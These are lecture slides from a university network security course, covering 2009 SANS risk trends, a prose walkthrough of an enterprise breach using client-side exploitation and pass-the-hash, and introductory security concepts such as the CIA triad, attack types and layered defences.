NETE0519 & ISEC0513 Computer Network Security

Supakorn Kungpisdan, Ph.D.

supakorn@mut.ac.th

Supakorn Kungpisdan
 Education
 PhD (Computer Science and Software Engineering), Monash University, Australia  M.Eng. (Computer Engineering), KMUTT

 Specializations
 Information and Network Security, Electronic Commerce, Formal Methods, Computer Networking

 Experiences
 Associate Dean (Research), FIST  Director, Master of Science in Network Engineering, MUT

 http://supakorn.mut.ac.th/  http://www.msne.mut.ac.th/
NETE0519-ISEC0513 2

Course Descriptions
 Textbook  W. Stallings: Cryptography and Network Security, 4th Edition, Pearson Prentice Hall, ISBN 0-13-202322-9

 Supplementary materials
 M. E. Whitman and H. J. Mattord, Principles of Information Security, 3rd Edition, Thomson, ISBN 1-4239-0177-0  G. De Laet and G. Schauwers: Network Security Fundamentals, Cisco Press, ISBN 1-58705-167-2

 http://www.msne.mut.ac.th/

NETE0519-ISEC0513

Evaluation Criteria
    Quizzes 10% Lab 30% Midterm exam 20% Final exam 40%

NETE0519-ISEC0513

Course Outlines
 Network Security Overview  Information Security
 Symmetric Cryptography, Public-key Cryptography, Hash Functions and MAC

 Network Security
 IP Security, Web Security, Email Security, Firewalls, Intrusion Detection Systems

 Security Management
 Security Standards and Policy

NETE0519-ISEC0513

The Top Cyber Security Risks

http://www.sans.org/top-cyber-security-risks/

Network Security Trends in 2009

Priority One: Client-side Software that Remains Unpatched

 Targeted email attacks, often called spear phishing, are exploiting client-side vulnerabilities in commonly used programs such as Adobe PDF Reader, QuickTime, Adobe Flash and Microsoft Office.  Those same client-side vulnerabilities are exploited by attackers when users visit infected web sites.  On average, major organizations take at least twice as long to patch client-side vulnerabilities as they take to patch operating system vulnerabilities.

The highest priority risk is getting less attention than the lower priority risk
NETE0519-ISEC0513 7

Priority Two: Vulnerable Internet-facing Websites

 Attacks against web applications constitute more than 60% of the total Internet attacks  These vulnerabilities are being exploited widely to convert trusted web sites into malicious websites serving content that contains client-side exploits.  More than 80% of vulnerabilities are related to web application vulnerabilities such as SQL injection and Cross-Site Scripting flaws in open-source as well as custom-built applications

NETE0519-ISEC0513

Rising Numbers of Zero-day Vulnerabilities

 Over the past 3 years, the number of people discovering zero-day vulnerabilities, as measured by multiple independent teams discovering the same vulnerabilities at different times, increases.  Some vulnerabilities have remained unpatched for as long as two years.  There is a corresponding shortage of highly skilled vulnerability researchers working for government and software vendors.  Checking for upcoming zero-day attacks at http://www.zerodayinitiative.com/advisories/upcoming/

NETE0519-ISEC0513

Application Vulnerabilities Exceed OS Vulnerabilities

 Due to the current trend of converting trusted web sites into malicious servers, browsers and client-side applications that can be invoked by browsers seem to be consistently targeted

NETE0519-ISEC0513

10

Web Application Attacks

 Two main avenues for exploiting and compromising web servers: brute force password guessing attacks and web application attacks  Microsoft SQL, FTP, and SSH servers are popular targets for password guessing attacks because of the access that is gained if a valid username/password pair is identified.  SQL Injection, Cross-site Scripting and PHP File Include attacks continue to be the three most popular techniques used for compromising web sites.

NETE0519-ISEC0513

11

Windows: Conficker/Downadup
 Attacks on Microsoft Windows operating systems were dominated by Conficker (aka Downadup) worm variants (5 variants) (first detect in Nov 2008)  More than 5 million computers in 200 countries were infected  For the past six months, over 90% of the attacks recorded for Microsoft targeted the buffer overflow vulnerability described in the Microsoft Security Bulletin MS08-067.  Believed to be the largest computer worm infection since the 2003 SQL Slammer

NETE0519-ISEC0513

12

Conficker

NETE0519-ISEC0513

http://en.wikipedia.org/wiki/Conficker

13

Attacks on Critical Microsoft Vulnerabilities (Mar-Sept 2009)

NETE0519-ISEC0513

14

Attacks on Critical Microsoft Vulnerabilities (Mar-Sept 2009)

Attacks on Critical Microsoft Vulnerabilities (last 6 months)

NETE0519-ISEC0513

15

Apple: QuickTime and Six More

 Apple has released patches for many vulnerabilities in QuickTime over the past year.  QuickTime vulnerabilities account for most of the attacks that are being launched against Apple software.  Note that QuickTime runs on both Mac and Windows Operating Systems.  The following vulnerabilities should be patched for any QuickTime installations: CVE-2009-0007, CVE-2009-0003, CVE-2009-0957

NETE0519-ISEC0513

16

Attacks on Critical Apple Vulnerabilities (Mar-Sept 2009)

NETE0519-ISEC0513

17

Origin and Destination Analysis for Key Attacks

 These categories are:
     Server-Side HTTP attacks, Client-Side HTTP attacks, PHP Remote File Include, Cross-site Scripting attacks, and SQL Injection attacks.

NETE0519-ISEC0513

18

Server-Side HTTP Attacks by Destination Country (Mar-Sept 2009)

NETE0519-ISEC0513

19

Server-Side HTTP Attacks by Source Country (Mar-Sept 2009)

NETE0519-ISEC0513

20

SQL Injection Attacks by Destination Country (Mar-Sept 2009)

NETE0519-ISEC0513

21

SQL Injection Attacks by Source Country (Mar-Sept 2009)

NETE0519-ISEC0513

22

Remote PHP File Include Attack

 With the exception of a major attacks originating from Thailand in April, the number of PHP File Include attacks in August is less than half the March/May average.

NETE0519-ISEC0513

23

PHP Remote File Include Attacks by Source Country (MarSept 2009)

NETE0519-ISEC0513

24

Application Patching is Much Slower than Operating System Patching

Qualys Top 10 application vulnerabilities in H1 2009
1.WordPad and Office Text Converters Remote Code Execution Vulnerability (MS09-010) 2.Sun Java Multiple Vulnerabilities (244988 and others) 3.Sun Java Web Start Multiple Vulnerabilities May Allow Elevation of Privileges(238905) 4.Java Runtime Environment Virtual Machine May Allow Elevation of Privileges (238967) 5.Adobe Acrobat and Adobe Reader Buffer Overflow (APSA09-01) 6.Microsoft SMB Remote Code Execution Vulnerability (MS09-001) 7.Sun Java Runtime Environment GIF Images Buffer Overflow Vulnerability 8.Microsoft Excel Remote Code Execution Vulnerability (MS09-009) 9.Adobe Flash Player Update Available to Address Security Vulnerabilities (APSB09-01) 10.Sun Java JDK JRE Multiple Vulnerabilities (254569)

NETE0519-ISEC0513

25

Microsoft OS Vulnerabilities

NETE0519-ISEC0513

26

Application Vulnerabilities Patching Cycles

NETE0519-ISEC0513

27

Tutorial: Real Life HTTP Client-side Exploitation Example

 Acme Widgets Corporation suffered a major breach from attackers who were able to compromise their entire internal network infrastructure using two of the most powerful and common attack vectors today against Windows machines:  Exploitation of client-side software  Pass-the-hash attacks

NETE0519-ISEC0513

28

Step 0: Attacker Places Content on Trusted Site

 Attacker begins by placing content on a trusted third-party website, e.g. a social networking, blogging, or photo sharing website, or any other web server that hosts content posted by public users.  The attacker's content includes exploitation code for unpatched client-side software.

NETE0519-ISEC0513

29

Step 1: Client-Side Exploitation

 A user on the internal Acme Widgets enterprise network surfs the Internet from a Windows machine that is running an unpatched client-side program, e.g. a media player (e.g., Real Player, Windows Media Player), document display program (e.g., Acrobat Reader), or an office suite (e.g., Microsoft Word, Excel, Powerpoint, etc.).

NETE0519-ISEC0513

30

Step 2: Establish Reverse Shell Backdoor Using HTTPS

 The attacker's exploit code installs a reverse shell backdoor program on the victim machine. This program gives the attacker command shell access of the victim machine, communicating between this system and the attacker using outbound HTTPS access from victim to attacker.

NETE0519-ISEC0513

31

Steps 3 & 4: Dump Hashes and Use Passthe-Hash Attack to Pivot

NETE0519-ISEC0513

32

Steps 3 & 4: Dump Hashes and Use Passthe-Hash Attack to Pivot (cont.)
 The attacker uses shell access of the initial victim system to load a local privilege escalation exploit program onto the victim machine.  This program allows the attacker to jump from the limited privilege user account to full system privileges on this machine.  The attacker uses shell access of the initial victim system to load a local privilege escalation exploit program onto the victim machine. This program allows the attacker to jump from the limited privilege user account to full system privileges on this machine.  Instead of cracking the local administrator password, the attacker uses a Windows pass-the-hash program to authenticate to another Windows machine on the enterprise internal network, a fully patched client system on which this same victim user has full administrative privileges.
NETE0519-ISEC0513 33

Step 5: Pass the Hash to Compromise Domain Controller

NETE0519-ISEC0513

34

Step 5: Pass the Hash to Compromise Domain Controller (cont.)

 Attacker uses a password hash from a local account on the fully patched Windows client to access the domain controller system, again using a pass-the-hash attack to gain shell access on the domain controller.  Because the password for the local administrator account is identical to the password for a domain administrator account, the password hashes for the two accounts are identical.  Therefore, the attacker can access the domain controller with full domain administrator privileges, giving the attacker complete control over all other accounts and machines in that domain.

NETE0519-ISEC0513

35

Steps 6 and 7: Exfiltration

 With full domain administrator privileges, the attacker now compromises a server machine that stores secrets for the organization.  The attacker then exfiltrates this sensitive information, consisting of over 200 Megabytes of data. The attacker pushes this data out to the Internet from the server, again using HTTPS to encrypt the information, minimizing the chance of it being detected.

NETE0519-ISEC0513

36

Lecture 01 Network Security Overview

Supakorn Kungpisdan, Ph.D. supakorn@mut.ac.th

What is Security?
 The quality or state of being secureto be free from danger  A successful organization should have multiple layers of security in place:
     Information Security Systems Security Network Security Security Management Physical security

NETE0519-ISEC0513

38

Security Trends

NETE0519-ISEC0513

39

C.I.A Triangle
 Confidentiality
 Ensure that the message is accessible only by authorized parties

 Integrity
 Ensure that the message is not altered during the transmission

 Availability
 Ensure that the information on the system is available for authorized parties at appropriate times without interference or obstruction

NETE0519-ISEC0513

40

Vulnerabilities, Threats, and Attacks

 Vulnerability
 A weakness in the security system  E.g. a program flaw, poor security configuration, bad password policy

 Threat
 A set of circumstances or people that potentially causes loss or harm to a system

 Attack
 An action or series of actions to harm a system

NETE0519-ISEC0513

41

Relationships among Different Security Components

NETE0519-ISEC0513

42

Relationship of Threats and Vulnerabilities

NETE0519-ISEC0513

43

How Hackers Exploit Weaknesses

NETE0519-ISEC0513

44

Types of Attacks
 Interruption
 Attack on Availability

 Interception
 Attack on Confidentiality

NETE0519-ISEC0513

45

Types of Attacks (cont.)

 Modification
 Attack on Integrity  Tampering a resource

 Fabrication
 Attack on Authenticity  Impersonation, masquerading

NETE0519-ISEC0513

46

Passive VS Active Attacks

 Passive Attacks
 The goal is to obtain information that is being transmitted.  E.g. Release of confidential information and Traffic analysis  Difficult to detect not alter data nobody realizes the existence of the third party  Initiative to launch an active attack  Interception  May be relieved by using encryption

 Active Attacks
 Involve modification of the data stream or creation of a false stream  E.g. Masquerade, replay, message modification, denial of services  Potentially detected by security mechanisms  Interruption, Modification, Fabrication

NETE0519-ISEC0513

47

Hackers
     White Hat Hackers Grey Hat Hackers Script Kiddies Hacktivists Crackers or Black Hat Hackers

NETE0519-ISEC0513

48

Malicious Codes
 Viruses
 A destructive program code that attaches itself to a host and copies itself and spreads to other hosts  Viruses replicates and remains undetected until being activated.

 Trojans
 Externally harmless program but contains malicious code

 Spyware
 Software installed on a target machine sending information back to an owning server

 Worms
 Unlike viruses, worms is independent of other programs or files. No trigger is needed.
NETE0519-ISEC0513 49

Security at Each Layer

NETE0519-ISEC0513

50

Security at Each Layer (cont.)

 Firewall combats a range of attacks including some DoS attacks  Proxy protects the application layer. It combats against unauthorized access and packet spoofing  NAT hides LAN addresses and topology  STP cabling helps against network eavesdropping and signal interference  NIDS sensor monitors traffic at the network layer for known attack signatures  IPSec is configured for VPN connections. It protects against masquerading, data manipulation, and unauthorized access  Web server is configured against unauthorized access  Mail server with antivirus protects against viruses and DoS attacks

NETE0519-ISEC0513

51

A Model for Network Security

NETE0519-ISEC0513

52

A Model for Network Access Security

NETE0519-ISEC0513

53

Security Controls

NETE0519-ISEC0513

54

NETE0519-ISEC0513

55

NSTISSC Security Model

NETE0519-ISEC0513

56

Balancing Information Security and Access

 Impossible to obtain perfect securityit is a process, not a goal  Security should be considered balance between protection and availability  To achieve balance, level of security must allow reasonable access, yet protect against threats  Give an example of a completely secure information system !!!

NETE0519-ISEC0513

57

Balancing Information Security and Access

NETE0519-ISEC0513

58

Approaches to Information Security Implementation: Bottom-Up Approach

 Grassroots effort: systems administrators attempt to improve security of their systems  Key advantage: technical expertise of individual administrators  Seldom works, as it lacks a number of critical features:  Participant support  Organizational staying power

NETE0519-ISEC0513

59

Approaches to Information Security Implementation: Top-Down Approach

 Initiated by upper management
 Issue policy, procedures, and processes  Dictate goals and expected outcomes of project  Determine accountability for each required action

 The most successful also involve formal development strategy referred to as systems development life cycle

NETE0519-ISEC0513

60

Approaches to Information Security Implementation (cont.)

NETE0519-ISEC0513

61

Information Security: Is it an Art or a Science?

 Implementation of information security often described as combination of art and science  Security artesan idea: based on the way individuals perceive systems technologists since computers became commonplace

NETE0519-ISEC0513

62

Security as Art
 No hard and fast rules nor many universally accepted complete solutions  No manual for implementing security through entire system

NETE0519-ISEC0513

63

Security as Science
 Dealing with technology designed to operate at high levels of performance  Specific conditions cause virtually all actions that occur in computer systems  Nearly every fault, security hole, and systems malfunction are a result of interaction of specific hardware and software  If developers had sufficient time, they could resolve and eliminate faults
NETE0519-ISEC0513 64

Security as a Social Science

 Social science examines the behavior of individuals interacting with systems  Security begins and ends with the people that interact with the system  Security administrators can greatly reduce levels of risk caused by end users, and create more acceptable and supportable security profiles

NETE0519-ISEC0513

65

Questions?
Next week Symmetric Cryptography and Applications